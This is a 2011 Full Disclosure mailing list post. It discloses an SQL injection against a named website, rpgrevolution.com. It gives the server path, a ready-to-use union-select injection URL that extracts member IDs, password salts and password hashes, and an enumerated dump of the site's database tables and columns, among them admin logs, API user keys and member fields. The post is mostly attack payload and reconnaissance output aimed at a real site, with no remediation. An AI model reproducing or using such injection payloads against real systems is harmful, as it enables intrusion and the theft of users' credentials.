Full Disclosure mailing list archives

rpgrevolution.com SQL Injection
From: Bob Smith <bobbyhadababyitsaboy () googlemail com>
Date: Thu, 13 Jan 2011 20:07:38 -0600

/home/rpgrev/domains/rpgrevolution.com/public_html/

http://www.rpgrevolution.com/games.php?platform=all&genre=aaaaaaaaaaaaaaaaaaaaaaa'
union select 
1,user(),group_concat(converge_id),group_concat(converge_pass_salt),5,6,group_concat(converge_pass_hash),8,9,10,11,12,13,14,15
from ibf_members_converge-- -&list=desc&limiter=10&order=id

Salted


Corresponding Salt



access, -- userid,forumid,accessmask
article,
download,
download_cats,
game_cats,
game_comments,
game_downloads,
game_reviews,
game_votes,
games, -- id,title,developer,date,desc,platform,genre,status,url,feat,view,user,rating,downloads,approve
ibf_acp_help,
ibf_admin_login_logs,
ibf_admin_logs,
ibf_admin_permission_keys,
ibf_admin_permission_rows,
ibf_admin_sessions,
ibf_ahreports,
ibf_ahreports_addons,
ibf_ahreports_adminmsg,
ibf_ahreports_cats,
ibf_ahreports_comments,
ibf_ahreports_communicate,
ibf_ahreports_status,
ibf_announcements,
ibf_api_log,
ibf_api_users, --api_user_id,api_user_key,api_user_name,api_user_perms,api_user_ip
ibf_arcade_acthistory,
ibf_arcade_actihis,
ibf_arcade_activity,
ibf_arcade_cats,
ibf_arcade_challengeps,
ibf_arcade_challenges,
ibf_arcade_news,
ibf_arcade_scoreboard,
ibf_arcade_sessions,
ibf_arcade_sitngo,
ibf_arcade_sitngo_plyers,
ibf_arcade_tartemp,
ibf_attachments,
ibf_attachments_type,
ibf_badwords,
ibf_banfilters,
ibf_bulk_mail,
ibf_cache_store,
ibf_cal_calendars,
ibf_cal_events


ibf_validating
ibf_members_converge-converge_id,converge_email,converge_joined,converge_pass_hash,converge_pass_salt
ibf_members_partial
ibf_members-id,name,mgroup,email,joined,ip_address,posts,title,allow_admin_mails,time_offset,hide_email,email_pm,email_full,skin,warn_level,warn_lastwarn,language,last_post,restrict_post,view_sigs,view_img,view_avs,view_pop,bday_day,bday_month,bday_year,new_msg,msg_total,show_popup,misc,last_visit,last_activity,dst_in_use,view_prefs,coppa_user,mod_posts,auto_track,temp_ban,sub_end,login_anonymous,ignored_users,mgroup_others,org_perm_id,member_login_key,member_login_key_expire,subs_pkg_chosen,files,downloads,points,deposited,auto_collect,last_collect,extra_interest,creditcard,show_in_staff,has_blog,members_auto_dst,members_cache,members_disable_pm,members_display_name,members_created_remote,members_editor_choice,members_markers,arcade_gtype,arcade_sess_gid,arcade_sess_start,arcade_b_challenges,arcade_usepm,arcade_challenge_banned,arcade_challengeid,arcade_challenge,arcade_u_cha,arcade_session,arcade_time_spent,user_r_pp,jackpots_won,jackpots_points,arcade_won,arcade_spent,arcade_activity,arcade_activitywon,user_u_columns,


ibf_sessions-id,member_name,member_id,ip_address,browser,running_time,login_type,location,member_group,in_error,in_dldo,in_dlcat,in_dlfile,location_1_type,location_1_id,location_2_type,location_2_id,location_3_type,location_3_id,in_game

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/